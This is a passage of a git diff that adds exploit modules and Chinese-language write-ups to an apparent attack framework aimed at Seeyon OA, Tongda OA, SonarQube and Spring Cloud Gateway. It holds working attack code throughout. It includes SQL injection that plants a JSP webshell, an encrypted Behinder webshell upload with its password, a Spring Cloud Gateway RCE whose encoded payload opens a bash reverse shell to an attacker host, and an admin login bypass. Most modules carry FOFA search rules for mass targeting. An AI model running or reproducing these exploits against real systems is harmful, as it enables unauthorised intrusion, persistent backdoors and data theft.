= target + "/yyoa/ext/createMysql.jsp" + vuln_url3 = target + "/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0" + vuln_url4 = target + "/yyoa/assess/js/initDataAssess.jsp" + vuln_url5 = target + "/seeyon/management/status.jsp" + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r1 = requests.get(url=vuln_url1, headers=headers, verify=False, timeout=5) + r2 = requests.get(url=vuln_url2, headers=headers, verify=False, timeout=5) + r3 = requests.get(url=vuln_url3, headers=headers, verify=False, timeout=5) + r4 = requests.get(url=vuln_url4, headers=headers, verify=False, timeout=5) + r5 = requests.get(url=vuln_url5, headers=headers, verify=False, timeout=5) + if 'root' in r1.text and r1.status_code == 200: + result['信息泄露path1'] = vuln_url1 + else: + pass + if 'root' in r2.text and r2.status_code == 200: + result['信息泄露path2'] = vuln_url2 + else: + pass + if 'xls' in str(r3.headers).lower() and r3.status_code == 200: + result['信息泄露ppath3'] = vuln_url3 + else: + pass + if 'personList' in r4.text and r4.status_code == 200: + result['信息泄露path4'] = vuln_url4 + else: + pass + if 'Password' in r5.text and r5.status_code == 200: + result['信息泄露path5'] = vuln_url5 +" 默认密码:WLCCYBD@SEEYON" + else: + pass + + if result: + tmpdic={ + 'target':target, + 'poc':NAME + } + result=dict(tmpdic,**result) + return result + except: + pass + + +if __name__ == '__main__': + poc("https://127.0.0.1") diff --git a/Moudle/Seeyon/Seeyon_OA_SQLInjection.py b/Moudle/Seeyon/Seeyon_OA_SQLInjection.py new file mode 100644 index 0000000..49f7de0 --- /dev/null +++ b/Moudle/Seeyon/Seeyon_OA_SQLInjection.py @@ -0,0 +1,97 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import random +import re +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='Seeyon_OA_SQLInjection' +AUTHOR="Joker" +REMARK='致远OA SQL注入漏洞' +FOFA_RULE='title="致远A8+协同管理软件.A6"' +###################################################### + +def poc(target): + result = {} + vuln_url = target + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20@@basedir)" + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r1 = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) + if '序号' in r1.text and "@@basedir" in r1.text and r1.status_code == 200: + result['target'] = target + result['poc'] = NAME + return result + else: + pass + except Exception as e: + pass + +def exp(target): + vuln_url = target + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20@@basedir)" + vuln_ur2 = target + "/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(md5(1)),4#" + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r1 = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) + if '序号' in r1.text and "@@basedir" in r1.text and r1.status_code == 200: + OA_dir = re.findall(r'>(.*)\\UFseeyon\\', r1.text)[0] + OA_dir = OA_dir[:2] + '/' + OA_dir[3:] + print ('[+] ' + target + "存在致远OA test.jsp sql注入漏洞,安装路径为:{}".format(target, OA_dir)) + webshell_name = "test_upload{}.jsp".format(random.randint(1,999)) + OA_dir = OA_dir + "/UFseeyon/OA/tomcat/webapps/yyoa/{}".format(webshell_name) + exp1(target, OA_dir, webshell_name) + else: + pass + except Exception as e: + print("目标 {} 请求失败".format(target), e) + + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r2 = requests.get(url=vuln_ur2, headers=headers, verify=False, timeout=5) + if r2.status_code == 200 and "c4ca4238a0b923820dcc509a6f75849b" in r2.text: + print ("[+] {} 存在致远OA setextno.jsp sql注入漏洞".format(target, vuln_ur2)) + else: + pass + except Exception as e: + print("目标 {} 请求失败".format(target)) + +def exp1(target, OA_dir, webshell_name): + vuln_url = target + "/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20unhex(%273C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E%27)%20%20into%20outfile%20%27{}%27".format(OA_dir) + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + response = requests.get(url=vuln_url, verify=False, timeout=5) + if 'already' in response.text and response.status_code == 200: + print("文件写入木马上传失败,目标已存在相同文件,请重新运行") + elif "No Data" in response.text and response.status_code == 200: + print("[o] 文件写入木马上传成功,上传路径为 {}".format(OA_dir)) + exp2(target, webshell_name) + else: + print("[x] 目标 {} 木马上传失败".format(target)) + except Exception as e: + print("[x] 目标 {} 请求失败".format(target), e) + +def exp2(target, webshell_name): + rebe_webshell = "testweb{}.jsp".format(random.randint(1,999)) + vuln_url = target + "/yyoa/{}?f={}".format(webshell_name, rebe_webshell) + data = "t=%3C%25%40page%20import%3D%22java.util.*%2Cjavax.crypto.*%2Cjavax.crypto.spec.*%22%25%3E%3C%25!class%20U%20extends%20ClassLoader%7BU(ClassLoader%20c)%7Bsuper(c)%3B%7Dpublic%20Class%20g(byte%20%5B%5Db)%7Breturn%20super.defineClass(b%2C0%2Cb.length)%3B%7D%7D%25%3E%3C%25if%20(request.getMethod().equals(%22POST%22))%7BString%20k%3D%223c961f49d5fa96c5%22%3Bsession.putValue(%22u%22%2Ck)%3BCipher%20c%3DCipher.getInstance(%22AES%22)%3Bc.init(2%2Cnew%20SecretKeySpec(k.getBytes()%2C%22AES%22))%3Bnew%20U(this.getClass().getClassLoader()).g(c.doFinal(new%20sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3B%7D%25%3E" + headers = { + "Content-Type": "application/x-www-form-urlencoded" + } + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + print("[o] 正在请求:{}".format(vuln_url)) + response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5) + if response.status_code == 200: + print("[o] 木马上传成功, 路径为:{}/yyoa/{}".format(target, rebe_webshell)) + print("[o] 请使用冰蝎连接,密码为: szxsd") + else: + print("[x] 木马上传失败,可能被拦截".format(target)) + except Exception as e: + print("[x] 目标 {} 请求失败".format(target), e) + + +if __name__ == '__main__': + poc("https://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Seeyon/Seeyon_OA_SessionLeak_Upload.py b/Moudle/Seeyon/Seeyon_OA_SessionLeak_Upload.py new file mode 100644 index 0000000..d8eedfa --- /dev/null +++ b/Moudle/Seeyon/Seeyon_OA_SessionLeak_Upload.py @@ -0,0 +1,84 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import sys +import time +import re +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='Seeyon_OA_SessionLeak_Upload' +AUTHOR="Joker" +REMARK='致远OA Session泄露 任意文件上传漏洞' +FOFA_RULE='title="致远OA' +###################################################### + +def poc(target): + result = {} + test_url1 = target + "/seeyon/thirdpartyController.do" + headers = { + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36", + "Content-Type": "application/x-www-form-urlencoded", + } + data = "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1" + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + response = requests.post(url=test_url1, headers=headers, data=data, verify=False, timeout=5) + if response.status_code == 200 and "a8genius.do" in response.text: + result['target'] = target + result['poc'] = NAME + return result + except: + pass + +def exp(target_url): + vuln_url = target_url + "/seeyon/thirdpartyController.do" + headers = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", + "Content-Type": "application/x-www-form-urlencoded", + } + data = "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1" + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5) + if response.status_code == 200 and "a8genius.do" in response.text and 'set-cookie' in str(response.headers).lower(): + cookies = response.cookies + cookies = requests.utils.dict_from_cookiejar(cookies) + cookie = cookies['JSESSIONID'] + targeturl = target_url + '/seeyon/fileUpload.do?method=processUpload' + print("[o] 目标 {} 正在上传压缩包文件.... \n[o] Cookie: {}".format(target_url, cookie)) + files = [('file1', ('360icon.png', open('platform.zip', 'rb'), 'image/png'))] + headers = {'Cookie':"JSESSIONID=%s" % cookie} + data = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver':"false", "type": '0','isEncrypt': "0"} + response = requests.post(url=targeturl,files=files,data=data, headers=headers,timeout=60,verify=False) + #print(response.text) + reg = re.findall('fileurls=fileurls\+","\+\'(.+)\'',response.text,re.I) + if len(reg)==0: + sys.exit("上传文件失败") + exp2(target_url, cookie, reg, headers) + else: + print("[x] 目标 {} 不存在漏洞".format(target_url)) + except Exception as e: + pass + +def exp2(target_url, cookie, reg, headers): + vuln_url = target_url + '/seeyon/ajax.do' + datestr = time.strftime('%Y-%m-%d') + post = 'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22' + datestr + '%22%2C%22' + reg[0] + '%22%5D' + + headers['Content-Type']="application/x-www-form-urlencoded" + print("[o] 目标 {} 正在解压文件....".format(target_url)) + try: + response = requests.post(vuln_url, data=post,headers=headers,timeout=60,verify=False) + if response.status_code == 500: + print("[+]{}/seeyon/common/designer/pageLayout/123.jsp szxsd 默认Webshell地址".format(target_url)) + else: + print("[x] 目标 {} 不存在漏洞".format(target_url)) + except Exception as e: + pass + + +if __name__ == '__main__': + poc("https://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Seeyon/Seeyon_OA_Session_Leak.py b/Moudle/Seeyon/Seeyon_OA_Session_Leak.py new file mode 100644 index 0000000..5d9d572 --- /dev/null +++ b/Moudle/Seeyon/Seeyon_OA_Session_Leak.py @@ -0,0 +1,32 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='Seeyon_OA_Session_Leak' +AUTHOR="Joker" +REMARK='致远OA getSessionList.jsp Session泄漏漏洞' +FOFA_RULE='title="致远OA' +###################################################### + +def poc(target): + result = {} + vuln_url = target + "/yyoa/ext/https/getSessionList.jsp?cmd=getAll" + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) + if "/yyoa/index.jsp" not in r.text and "" in r.text and r.status_code == 200: + result['target'] = target + result['poc'] = NAME + result['session'] = vuln_url + return result + except: + pass + + +if __name__ == '__main__': + poc('https://127.0.0.1') \ No newline at end of file diff --git a/Moudle/Seeyon/platform.zip b/Moudle/Seeyon/platform.zip new file mode 100644 index 0000000..1771a68 Binary files /dev/null and b/Moudle/Seeyon/platform.zip differ diff --git a/Moudle/SonarQube/CVE_2020_27986.py b/Moudle/SonarQube/CVE_2020_27986.py new file mode 100644 index 0000000..c83582b --- /dev/null +++ b/Moudle/SonarQube/CVE_2020_27986.py @@ -0,0 +1,36 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecurePlatformWarning + + +# 脚本信息 +###################################################### +NAME='CVE_2020_27986' +AUTHOR="Faith" +REMARK='SonarQube API 未授权访问漏洞' +FOFA_RULE='app="sonarQube-代码管理"' +###################################################### + +def poc(target): + result = {} + url = target + "/api/settings/values" + headers = {"UserAgent":ua} + try: + requests.packages.urllib3.disable_warnings(InsecurePlatformWarning) + r = requests.get(url=url,headers=headers,verify=False,timeout=3) + if "key" in r.text and r.status_code ==200: + result['target'] = target + result['poc'] = NAME + result['url'] = url + return result + else: + pass + except : + pass + + +if __name__ == '__main__': + poc("http://127.0.0.1") diff --git a/Moudle/Spring/CVE_2022_22947.py b/Moudle/Spring/CVE_2022_22947.py new file mode 100644 index 0000000..574b969 --- /dev/null +++ b/Moudle/Spring/CVE_2022_22947.py @@ -0,0 +1,70 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 +import random +import base64 +import re +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +# 脚本信息 +###################################################### +NAME = 'CVE-2022-22947' +AUTHOR = "境心" +REMARK = 'Spring Cloud Gateway RCE' +FOFA_RULE = 'icon_hash="116323821"' +###################################################### + +def generate_random_str(randomlength=5): + random_str = '' + base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz' + length = len(base_str) - 1 + for i in range(randomlength): + random_str += base_str[random.randint(0, length)] + return random_str + +def poc(target,rem_ip="127.0.0.1",rem_port="80"): + result = {} + str_code = generate_random_str() + if target[-1] == "/": + target = target.strip("/") + url13 = target + "/actuator/gateway/routes/" + str_code + print(url13) + url2 = target + "/actuator/gateway/refresh" + headers = { + 'Accept-Encoding': 'gzip, deflate', + 'Accept': '*/*', + 'Accept-Language': 'en', + 'User-Agent': ua, + 'Connection': 'close', + 'Content-Type': 'application/json' + } + poc_data = "eyAiaWQiOiAiYWExMTIyMzMiLCAiZmlsdGVycyI6IFt7ICJuYW1lIjogIkFkZFJlc3BvbnNlSGVhZGVyIiwgImFyZ3MiOiB7ICJuYW1lIjogIlJlc3VsdCIsICJ2YWx1ZSI6ICIje25ldyBTdHJpbmcoVChvcmcuc3ByaW5nZnJhbWV3b3JrLnV0aWwuU3RyZWFtVXRpbHMpLmNvcHlUb0J5dGVBcnJheShUKGphdmEubGFuZy5SdW50aW1lKS5nZXRSdW50aW1lKCkuZXhlYyhuZXcgU3RyaW5nW117XCJpZFwifSkuZ2V0SW5wdXRTdHJlYW0oKSkpfSIgfSB9XSwgInVyaSI6ICJodHRwOi8vZXhhbXBsZS5jb20iIH0=" + exp_data = "eyAiaWQiOiAiYWExMTIyMzMiLCAiZmlsdGVycyI6IFt7ICJuYW1lIjogIkFkZFJlc3BvbnNlSGVhZGVyIiwgImFyZ3MiOiB7ICJuYW1lIjogIlJlc3VsdCIsICJ2YWx1ZSI6ICIje25ldyBTdHJpbmcoVChvcmcuc3ByaW5nZnJhbWV3b3JrLnV0aWwuU3RyZWFtVXRpbHMpLmNvcHlUb0J5dGVBcnJheShUKGphdmEubGFuZy5SdW50aW1lKS5nZXRSdW50aW1lKCkuZXhlYyhuZXcgU3RyaW5nW117XCIvYmluL2Jhc2hcIixcIi1jXCIsXCJiYXNoIC1pID4mIC9kZXYvdGNwL3JlbV9pcC9yZW1fcG9ydCAwPiYxXCJ9KS5nZXRJbnB1dFN0cmVhbSgpKSl9IiB9IH1dLCAidXJpIjogImh0dHA6Ly9leGFtcGxlLmNvbSIgfQ==" + + if rem_ip =="127.0.0.1": + a = requests.post(url13, headers=headers,data=base64.b64decode(poc_data).decode().replace('aa112233', str_code), verify=False, timeout=5) + else: + requests.post(url13, headers=headers,data=base64.b64decode(exp_data).decode().replace('rem_ip', rem_ip).replace('rem_port',rem_port).replace('aa112233', str_code), verify=False, timeout=5) + + b= requests.post(url2, headers=headers, verify=False, timeout=5) + res = requests.get(url13, headers=headers, verify=False, timeout=5) + try: + res1 = re.findall("Result = '(.*)'", res.text)[0] + except IndexError as ierro: + pass + else: + result['vurl'] = url13 + result['poc'] = NAME + result['command_res'] = res1 + result['message'] = "存在Spring Cloud Gateway RCE漏洞" + return result + +if __name__ == '__main__': + poc("http://127.0.0.1") + # exp单独调用方式 + # poc("https://27.0.0.1","vpsip","vpsport") diff --git a/Moudle/TDXK/TDXK_Any_file_upload.md b/Moudle/TDXK/TDXK_Any_file_upload.md new file mode 100644 index 0000000..9688749 --- /dev/null +++ b/Moudle/TDXK/TDXK_Any_file_upload.md @@ -0,0 +1,172 @@ +# 1、漏洞描述 + +通达OA存在前台任意文件上传漏洞,结合文件包含,可直接获取服务器权限 + +# 2、影响范围 + +- 受影响的版本有: + +V11版 + +2017版 + +2016版 + +2015版 + +2013增强版 + +2013版 + + + +- 受影响的文件上传漏洞文件: + +/ispirit/im/upload.php + + + +- 受影响的文件包含漏洞文件: + +2013版(可能大多数遇到的是这个): + +/ispirit/interface/gateway.php + + + +2017版: + +/mac/gateway.php + + + +# 3、本地环境搭建 + +下载其中一个受影响的版本安装包,直接傻瓜式下一步自动安装。 + + + +# 4、漏洞复现 + +具体源码审计分析就先不看了,漏洞利用具体分两步,第一先上传后缀为jpg、内容为任意(POC验证)或shell(EXP利用)的jpg图片,第二通过文件包含漏洞,将上传后的文件路径组合到POST传输的json格式的form表单之中,通过访问文件包含漏洞的php文件,即可组合实现漏洞验证/利用。 + +## 4.1、文件上传 + +坑点1: + +Content-Type内容要标明为form表单,并且要有boundary,内容除了那四个-之外,可以自定义,不过要与POST表单中的一致。 + +![](images/1.png) + +坑点2: + +POST表单中,每一个表单与其内容之间要有回车换行,这是文件上传的固定格式,否则上传文件会失败。 + +表单的name值不要改,~~上边三个表单的内容2、123、1最好也别改,会影响返回的内容详细程度。~~ + +更正一下上边删除线的内容,这三个表单里的内容最好全部改为1,因为后边深入调试的时候,poc批量跑一些站,本来有漏洞的出现了漏报,因这里的数字导致返回不一致,详见坑点3. + +脚本和下边的POST包中已更正这些坑点。 + +![](images/2.png) + +坑点3: + +这里后期调试的时候,批量跑了一些站,发现存在漏报,如下,这种的是存在漏洞的,但是因为坑点2中删除线中提到的表单内容,导致返回包没返回全,正则取值的时候,就漏掉了。 + +第二张图中是修正后的返回,其中1标识的是存在漏洞的,2标识的是不存在漏洞的。 + +脚本和下边的POST包中已更正这些坑点。 + +![](images/3.png) + +![](images/4.png) + +坑点4: + +并不是第一步文件传上去了,就算成功了,上边总结的两个包含的php文件路径并不全,所以,也有可能文件传上去了,但是不知道或没有这个包含的php文件路径,也是白搭。调试中也遇到这个问题。 + + +POST上传包: + +``` +POST /ispirit/im/upload.php HTTP/1.1 +Host: 127.0.0.1 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: PHPSESSID=000 +Connection: close +Content-Length: 559 + + +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="UPLOAD_MODE" + +1 +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="P" + +1 +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="DEST_UID" + +1 +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg" +Content-Type: image/jpeg + + +------WebKitFormBoundarypyfBh1YB4pV8McGB-- +``` + +POST文件上传返回(这个返回内容代表上传成功): + +@符号与_ 之间的字符部分(不包含@与_ )是一个目录名,_到第一个| 之间的字符部分(不包含_与| )是文件名,后边需要用到这两个组合被文件包含的路径,文件后缀与上传的一致,为jpg + +![](images/5.png) + +## 4.2、文件包含 + +不同的通达OA版本,文件包含的php文件不同,一般有两种,详见2、影响范围, + +这里就不用上边说的content-type了,将上边提到的目录名和文件名分别替换POST内容中的相应值即可,下边例子中是替换2108和773815306; + +POST包: + +``` +POST /ispirit/interface/gateway.php HTTP/1.1 +Host: 127.0.0.1 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: PHPSESSID=000 +Connection: close +Content-Length: 58 + +json={"url":"/general/../../attach/im/2108/773815306.jpg"} +``` + +坑点: + +不知为何,请求没有问题的情况下,burpsuit没有返回上传的文件内容,而浏览器却可以; + +![](images/6.png) + +![](images/7.png) + +# 5、脚本 + +支持poc与exp,配合框架,poc可批量,只返回有漏洞的url,同时返回漏洞被包含文件的form-data,方便验证。 + +exp只支持单个脚本使用,使用方法详见脚本最下方的注释,其中的webshell为冰蝎原始的,有waf的基本上都能拦截,绕waf另说。 + diff --git a/Moudle/TDXK/TDXK_Any_file_upload.py b/Moudle/TDXK/TDXK_Any_file_upload.py new file mode 100644 index 0000000..1e0e7a8 --- /dev/null +++ b/Moudle/TDXK/TDXK_Any_file_upload.py @@ -0,0 +1,175 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import json +import requests +import requests.packages.urllib3 +import re +import io +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='TDXK_Any file upload' +AUTHOR="境心" +REMARK='TDXK_前台任意文件上传' +FOFA_RULE='app="TDXK-通达OA"' +###################################################### + +def poc_content(): + content = """------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="UPLOAD_MODE" + +1 +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="P" + +1 +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="DEST_UID" + +1 +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg" +Content-Type: image/jpeg + + +------WebKitFormBoundarypyfBh1YB4pV8McGB--""" + mem_string = io.StringIO() + mem_string.write(content) + mem_string.seek(0) + return mem_string + +def exp_content(): + content = """------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="UPLOAD_MODE" + +1 +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="P" + +1 +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="DEST_UID" + +1 +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg" +Content-Type: image/jpeg + +'; +fwrite($myfile, $txt); +fclose($myfile); +?> +------WebKitFormBoundarypyfBh1YB4pV8McGB--""" + mem_string = io.StringIO() + mem_string.write(content) + mem_string.seek(0) + return mem_string + +def verify_poc(target,exp=None): + upload_url = target+"/ispirit/im/upload.php" + headers = { + "User-Agent": ua, + "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB", + "Accept": "*/*", + "Accept-Encoding": "gzip, deflate", + "Accept-Language": "zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5", + "Cookie": "PHPSESSID=000", + "Connection": "close" + } + if exp == None: + mem_string = poc_content() + target_tmp_file = [('ATTACHMENT', ('upload_poc.jpg', mem_string.read(), 'image/jpeg'))] + elif exp == "exp": + mem_string = exp_content() + target_tmp_file = [('ATTACHMENT', ('upload_exp.jpg', mem_string.read(), 'image/jpeg'))] + try: + res = requests.post(upload_url, headers=headers, files=target_tmp_file, verify=False, timeout=5) + except: + pass + res_content = res.text + if "用户未登陆" in res_content: + return None + elif "\\u4e0a\\u4f20\\u5931\\u8d25" in res_content: + return None + else: + target_tmp_path = re.findall('@(\d+)_', str(res_content))[0] + target_filename = re.findall('_(\d+)\|', str(res_content))[0] + target_path = "/general/../../attach/im/"+str(target_tmp_path)+"/"+str(target_filename)+".jpg" + return target_path + +def poc(target,exp=None): + target_path = verify_poc(target,exp) + if target_path: + result = {} + include_url1 = target + "/ispirit/interface/gateway.php" + include_url2 = target + "/mac/gateway.php" + # 格式化POST表单 + include_json_data = {"url":target_path} + include_data = json.dumps(include_json_data) + include_form_data = {"json":include_data} + # 请求poc验证 + target_res = requests.post(include_url1, data=include_form_data, verify=False, timeout=5) + result['vul_url'] = include_url1 + if target_res.status_code == 404: + target_res = requests.post(include_url2, data=include_form_data, verify=False, timeout=5) + result['vul_url'] = include_url2 + if exp == None: + if "this is a friendly test" in str(target_res.text): + include_json_data = json.dumps(include_json_data) + target_post_data = "json=" + include_json_data + result['vul_post_data'] = target_post_data + result['message'] = "存在任意文件上传漏洞" + result['poc'] = NAME + return result + else: + pass + elif exp == "exp": + exp_url = target+"general/eninde.php" + exp_res = requests.get(exp_url, verify=False, timeout=5) + if exp_res.status_code == 200: + print("webshell地址为: "+target+"general/index.php") + elif exp_res.status_code == 404: + print("webshell生成失败") + else: + print("已上传成功,但连接时可能被waf拦截") + +if __name__ == '__main__': + # poc调用 + poc("http://127.0.0.1/") + # exp单独调用方式。 exp调用请传参时附带第二个参数内容,参数内容为exp + # poc("http://127.0.0.1/", "exp") \ No newline at end of file diff --git a/Moudle/TDXK/TDXK_Any_user_login.md b/Moudle/TDXK/TDXK_Any_user_login.md new file mode 100644 index 0000000..4af1e0e --- /dev/null +++ b/Moudle/TDXK/TDXK_Any_user_login.md @@ -0,0 +1,42 @@ +# 1、漏洞描述 + +通达OA部分版本存在任意用户登录漏洞,在未授权的情况下,通过一系列的请求操作,获取到合法的cookie,最终实现任意用户登录。 + +比任意在线用户登录漏洞更好一些,利用条件更低。 + +# 2、影响范围 + +通达OA < 11.5.200417版本 + 通达OA 2017版本 + +# 3、本地环境搭建 + +下载其中一个受影响的版本安装包,直接傻瓜式下一步自动安装。 + +# 4、漏洞利用 + +首先,访问http://ip:port/ispirit/login_code.php ,获取到codeuid + +![](images/11.png) + +其次,使用该codeuid作为post数据中的一部分,访问http://ip:port/general/login_code_scan.php ,返回status为1,则代表成功,否则返回status为0则代表失败,需要重复第一步获取新的codeuid,如果多次都是失败,则代表可能没有漏洞。 + +![](images/12.png) + +然后,同样使用该uid值作为传参,访问http://ip:port/ispirit/login_code_check.php?codeuid=【codeuid值】,与服务端交互,使得上一步客户端中使用的cookie合法。 + +![](images/14.png) + +如果是请求的时候没有带cookie,比如脚本请求,服务端会返回给客户端一个cookie。 + +![](images/15.png) + +最后,如果一直用的浏览器进行的操作,那么此时浏览器直接访问http://ip:port/general/index.php ,会发现已经成功登录上了admin账号,登录其他账号在第二步修改username的值。 + +或者在新的浏览器里,使用cookie编辑插件,通过第三步获取到的cookie值,访问http://ip:port/general/index.php ,直接登录。 + +![](images/16.png) + +# 5、exp + +既是poc,也是exp,通过框架调用,支持批量,只打印存在漏洞的URL,同时返回cookie,方便验证,返回网站title,初步了解网站归属。 \ No newline at end of file diff --git a/Moudle/TDXK/TDXK_Any_user_login.py b/Moudle/TDXK/TDXK_Any_user_login.py new file mode 100644 index 0000000..3c3369e --- /dev/null +++ b/Moudle/TDXK/TDXK_Any_user_login.py @@ -0,0 +1,75 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 +import re +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='TDXK_Any user login' +AUTHOR="境心" +REMARK='TDXK_任意用户登录' +FOFA_RULE='app="TDXK-通达OA"' +###################################################### + +def poc(target): + result = {} + # 第一步 + login_code_url = target+"/ispirit/login_code.php" + login_code_headers = { + "User-Agent" : ua + } + login_code_res = requests.get(login_code_url,headers=login_code_headers, verify=False,timeout=5) + login_code_res = eval(login_code_res.text) + try: + codeuid = login_code_res['codeuid'] + except: + pass + else: + # 第二步 + login_code_scan_url = target+"/general/login_code_scan.php" + login_code_scan_headers = { + "User-Agent" : ua + } + login_code_scan_data = { + "uid" : "1", + "codeuid" : codeuid, + "type" : "confirm", + "source" : "pc", + "username" : "admin" + } + # 第三步 + login_code_scan_res = requests.post(login_code_scan_url,data=login_code_scan_data,headers=login_code_scan_headers, verify=False,timeout=5) + if "1" in login_code_scan_res.text: + login_code_check_url = target+"/ispirit/login_code_check.php?codeuid="+codeuid + login_code_check_headers = { + "User-Agent" : ua + } + login_code_check_res = requests.get(login_code_check_url,headers=login_code_check_headers, verify=False,timeout=5) + if "confirm" in login_code_check_res.text: + login_cookie = login_code_check_res.headers['Set-Cookie'] + # 第四步 + target_url = target+"/general/index.php" + headers = { + "User-Agent": ua, + "Cookie" : login_cookie + } + target_res = requests.get(target_url,headers=headers,verify=False,timeout=5) + try: + title = re.findall('(.*)', str(target_res.text))[0] + except: + title = "" + result['vul_url'] = target_url + result['cookie'] = login_cookie + result['title'] = title + result['message'] = "存在任意用户登录漏洞" + return result + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/TDXK/TDXK_logined_any_file_upload.md b/Moudle/TDXK/TDXK_logined_any_file_upload.md new file mode 100644 index 0000000..5f477dc --- /dev/null +++ b/Moudle/TDXK/TDXK_logined_any_file_upload.md @@ 